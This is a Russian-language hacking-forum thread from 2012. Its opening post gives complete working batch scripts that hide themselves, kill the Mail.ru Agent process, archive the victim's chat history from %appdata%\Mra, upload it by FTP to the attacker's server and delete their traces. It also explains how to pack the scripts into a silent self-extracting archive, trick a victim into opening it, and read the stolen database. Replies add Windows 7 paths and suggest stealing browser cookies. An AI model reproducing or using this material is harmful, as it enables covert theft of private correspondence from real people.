ANTICHAT
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Воруем переписку "Mail.ru Агента" с компа, при помощи .bat (https://forum.antichat.xyz/showthread.php?t=8053005)

mir546 18.02.2012 01:00
Для осуществления хака потребуется СИ(социальная инженерия) и сервер. Я использовал бесплатный срев на http://www.webservis.ru
Будем заливать переписку из "Mail.ru Агента" на сервер, при помощи bat файлов(Win XP) и двух утилит.

Нам понадобится утилиты "Rar.exe" и "offsee.exe"(hidec)


Скачать утилиту для архивации "Rar.exe"
Скачать утилиту для скрытия cmd "offsee.exe"

Первый бат-файл я назвал «start» его содержание:

code:

@echo off
offsee.exe "bod.bat"
exit

он запускает второй батник через утилиту “hidec” с названием «offsee.exe» которая скроет консольное окно.

Второй бат-файл я назвал «bod» его содержание:
Спойлер
@echo off
set name=%usernamee%_%date%
attrib +H +S "bod.bat"
attrib +H +S "offsee.exe"
attrib +H +S "Rar.exe"
attrib +H +S "start.bat"
echo open Ваш_сервер >> ftpcmd
attrib +H +S "ftpcmd"
echo USER Логин Пароль >> ftpcmd
echo binary >> ftpcmd
echo quote PASV >> ftpcmd
echo cd public_html >> ftpcmd
echo put "\serv\%name%-Mra.rar" >> ftpcmd
echo disconnect >> ftpcmd
echo close >> ftpcmd
echo bye >> ftpcmd
taskkill /f /t /fi "MODULES eq YLUSBTEL.dll"
md "\serv"
attrib +H +S "\serv"
md "\serv\%name%"
rd /s /q "%appdata%\Mra\Avatars"
xcopy "%appdata%\Mra" "\serv\%name%" /s /c /g /h /r /y /q
Rar A -r -ep1 -df -m4 "\serv\%name%-Mra.rar" "\serv\%name%"
ftp -s:ftpcmd -n -v
rd /s /q "\serv"
attrib -H -S "ftpcmd"
del /f /q "ftpcmd"
attrib -H -S "Rar.exe"
del /f /q "Rar.exe"
attrib -H -S "start.bat"
del /f /q start.bat
attrib -H -S "offsee.exe"
del /f /q offsee.exe
del /f /q start.exe
attrib -H -S "bod.bat"
del /f /q %0
exit

Он завершит процесс Агента, скопирует, заархивирует переписку в rar, переименует в ИмяПользователя_Дата-Mra.rar и зальёт архив на ваш сервер.

Ключевые моменты: вместо «Ваш_сервер» нужно ввести адрес вашего серва. «Логин» «Пароль», соответственно то-же ваш логин и пароль. В строке
del /f /q start.exe
«start.exe» заменить на название фала само-распаковки(SFX-архив).

Лучше, конечно, все 4 файла залить в SFX-архив, с параметрами:
"Путь распаковки" - Создать в текущей папке
"Программа установки, Выполнить после установки" - start.bat
"Режим вывода информации" - Скрыть всё

Получившиеся приложение, само-собой, нужно дать жертве, что-бы она его открыла.

Украли, как прочитать? Тут два варианта:
1)В архиве, открыть файл находящийся в Mra\Base\mra.dbs с помощью программы "magent-hr3.0" Программа читает первые 1500 сообщений, а дальше нет.
Скачать "magent-hr3.0"
"Сайт" программы

2.1 Отключиться от интернета, установить М-Агент на комп, в папке "Mra"(%appdata%\Mra или Application Data\Mra) заменить все файлы и папки на файлы и папки из нашего архива.
2.2 Запустить М-Агент, ввести е-маил жертвы, ввести любой пароль и нажать "Сохранить пароль", далее можно смотреть полную переписку с кем угодно.

PS Естественно все это работает когда у жертвы WinXp и переписка не удалена самой жертвой.
PPS Будут вопросы, предложения, ошибки по моему "приложению" - пишите тут.
PPPS Всё в ознакомительных целях, автор ответственности не несёт.

zhasulan_kz 18.02.2012 01:00
А почему работает тоолько на WinXp ! а на Win 7 не работает что ли? (сейчас же почти у всех семерка?)

mir546 19.02.2012 01:00
Цитата:

Сообщение от zhasulan_kz

А почему работает тоолько на WinXp ! а на Win 7 не работает что ли? (сейчас же почти у всех семерка?)

Должно работать, лично я не пробовал. почти... да не у всех, большинство моих знакомых "разочаровавшись" в семерке ставят себе XP.

haker_ru 19.02.2012 01:00
Отпишитесь у кого робит?

Drago56 11.03.2012 01:00
А если такое только на одноклассники???

Middnight 15.03.2012 01:00
Дорогие друзья, помогите разобраться с MAIL.RU агентом, нужна история, есть вайлы mra.dbs, пароли логины, все есть вообщем, нужно ее от туда как-то извлеч

Middnight 15.03.2012 01:00
не работает данная программа....
дело в том что агент с кпк...
и нужна вся история

koroven 22.04.2012 01:00
Друзья, помогите разобраться с созданием сервера, попробовал создать на предлагаемом сайте, но в итоге пишет - "Страница в стадии разработки
зайдите позднее" . во всём остальном всё понятно .

Suicide[VII] 22.04.2012 01:00
Можно и проще в новом выпуске хакера публиковали одну прогу.. и с ней идут(2 консольные ):

Цитата:


magent_copy_kill.exe
mra_read.exe



Прикрутить из к батнику.. и заливать можно уже готовую историю.

tomichek) 22.04.2012 01:00
На XP и 7-ке разница в целях лазейке этой то, пути только разные, т.е. у 7-ки до архива Агента(любой версии) до History надо преодолеть:C:\Users\ИМЯ_ПОЛЬЗО АТЕЛЯ\AppData\Roaming\Mra\Base\mra.dbs,opt.d bs
На XP путь:C:\Documents and Settings\имя пользователя\Application DataMra\Base\mra.dbs,opt.dbs Только этим и отличается не работоспособность этого "виря" на 7-ке. Я бы ещё от "жертвы" несколько файлов отсюда прихватил бы:C:\Users\имя пользователя\AppData\Roaming\Mra\Updat e\russian.aff,russian.dict,russian.hash,usermade.d ict.

P.S. А лучше всего, такой тулзой "cookie" уганять с браузера/ов ламера для разносторонности.


Время: 05:28
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице